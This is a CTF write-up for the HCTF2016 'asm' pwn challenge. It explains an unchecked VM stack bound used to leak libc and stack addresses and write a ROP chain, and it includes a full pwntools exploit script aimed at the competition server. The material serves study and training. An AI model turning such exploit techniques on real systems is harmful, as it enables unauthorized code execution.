HCTF2016之asm

这个周末刚打完了今年xctf联赛的第一站HCTF,做一下笔记吧。做这个题花了很久的时间去找漏洞,找到了漏洞之后感觉可以总结一些分析漏洞的思路

文件结构

本题给了三个文件hello.asm,make_code(64位可执行程序),pwn(32位可执行程序)。Hello.asm是一段示例asm代码,make_code程序可以对输入的asm程序编译,pwn则负责解析执行编译出的程序。

因为需要攻击的对象是pwn,所以这里我们分析的目标主要是pwn,必要时通过分析make_code来确定asm代码的格式

逻辑分析

来看一下pwn的逻辑


read_bin_10d0()函数里面主要是做了一些数据读入和虚拟内存初始化等相关操作,仔细分析这里面并没有发现什么可以利用的漏洞(一开始还天真的以为发现了一个整数溢出漏洞~~~)。

这里我们主要关注 run_f9a()函数,这个函数完成了数据的解析执行:
1、首先检查vpc是否在合法范围


2、提取指令操作码

注意分析push和pop操作。对于push操作,程序只是限制了vsp下边界,但没有限制上边界,这就意味着可以往高地址内存写入数据。类似的,我们可以通过pop操作从低地址内存读取数据。在一般情况下,linux程序的内存map如下图所示

vsp的合法范围是在heap中,但是我们可以利用上面提到的逻辑漏洞来从bss段中读取数据(libc地址和stack地址)以及向stack写入rop链来达到最终获取shell的目的

获取libc地址

通过分析程序,我们发现可以通过lea指令将bss段的地址放到虚拟寄存器中,然后结合mov r0, pc,我们就可以计算出heap和bss段的相对位移,进而为我们修改vsp的值(使其指向bss段)提供了基础。通过上述操作,我们可以将vsp指向GOT表,然后调用pop指令将libc中函数地址存放到我们可读写的区域(虚拟寄存器)中。

获取stack地址

获取libc地址我们依然无法控制程序,因为我们没有办法修改got表,但我们可以利用push操作在栈上构造rop链,而构造rop链的前提是需要获取栈上的某一个位置的地址

继续搜索,我们可以在处理函数调用的地方找到方法


这里data是一个全局地址,而&_esp是栈上的一个地址,也就是说,我们通过一个函数调用[call puts]就可以把一个栈地址存放到bss段中。然后在利用pop指令就可以获得栈的地址

获取shell

完成了以上两个步骤,我们就只需要通过push操作来写入rop链了。

下面是利用代码:

from pwn import *


debug = 0
log = 1
if log: context.log_level = True

if debug:
    asm_code = """data:
0x23206873,0x726f776f,0x646c
end
push data
call puts
lea r0,r2
mov r1,pc
sub r2,r1,r0
sub sp,sp,r2
add sp,sp,0x27
pop r0
sub sp,sp,0x24
pop r1
pop r2
add r0,r0,0x80
mov sp,r0
push data
push 0x0
add r1,r1,0x22350
push r1
push 0x0
add r2,r2,0x3d4
push r2
$
    """
else:
    asm_code = """data:
0x23206873,0x726f776f,0x646c
end
push data
call puts
lea r0,r2
mov r1,pc
sub r2,r1,r0
sub sp,sp,r2
add sp,sp,0x27
pop r0
sub sp,sp,0x24
pop r1
pop r2
add r0,r0,0x80
mov sp,r0
push data
push 0x0
add r1,r1,0x22400
push r1
push 0x0
add r2,r2,0x3d4
push r2
$
    """
pm = process('./make_code')
pm.recvline()
pm.sendline(asm_code)
binary = pm.recv(1000)

if debug:
    p = process('./pwn')
else:
    p = remote('115.28.78.54', 23333)
    p.sendline('b66888c818c08d932ea91b8d6a1f122c2y7ZAdbh')
if debug: gdb.attach(p, open('debug'))

p.recvuntil('bin')
p.sendline(binary)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,029评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,395评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,570评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,535评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,650评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,850评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,006评论 3 408
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,747评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,207评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,536评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,683评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,342评论 4 330
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,964评论 3 315
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,772评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,004评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,401评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,566评论 2 349

推荐阅读更多精彩内容